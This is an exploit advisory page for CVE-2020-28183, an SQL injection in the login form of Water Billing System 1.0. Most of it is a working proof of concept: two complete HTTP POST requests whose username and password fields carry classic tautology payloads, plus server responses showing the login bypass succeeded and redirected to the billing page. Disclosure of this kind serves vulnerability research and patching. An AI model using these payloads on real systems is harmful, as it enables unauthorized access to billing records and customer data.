Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection

2020.11.18
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection # SQL Injection in 'username' and 'password' parameters allows attacker to run the SQL commands on the victim to extract entire DB. In advanced exploitation, an attacker can run the arbitrary code on the victim system to compromise it... # Exploit Author: Sarang Tumne (CyberInsane) # CVE ID: CVE-2020-28183 # Date: 4th Nov, 2020 # Confirmed on release 1.0 # Tested on: Windows Server 2016- XAMPP # Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html ############################################### POST /wbs/process.php HTTP/1.1 Host: 192.168.56.102:8080 Content-Length: 45 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.56.102:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.56.102:8080/wbs/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close username='%20or%200%3d0%20#&password=password Response: HTTP/1.1 200 OK Date: Mon, 02 Nov 2020 04:30:51 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30 X-Powered-By: PHP/7.2.30 Set-Cookie: PHPSESSID=4q8t10sshr36he7sl19hb563a0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 48 Connection: close Content-Type: text/html; charset=UTF-8 <script>windows: location="billing.php"</script> ========================================================================= POST /wbs/process.php HTTP/1.1 Host: 192.168.56.102:8080 Content-Length: 48 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.56.102:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.56.102:8080/wbs/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close username=admin&password=a'%20or%20'a'%20%3d%20'a Response: HTTP/1.1 200 OK Date: Mon, 02 Nov 2020 04:30:49 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30 X-Powered-By: PHP/7.2.30 Set-Cookie: PHPSESSID=34a478h4bhtliatg8l71kmp10r; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 48 Connection: close Content-Type: text/html; charset=UTF-8 <script>windows: location="billing.php"</script>

References:

https://github.com/sartlabs/0days/tree/main/WBS
https://www.exploit-db.com/exploits/49032


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top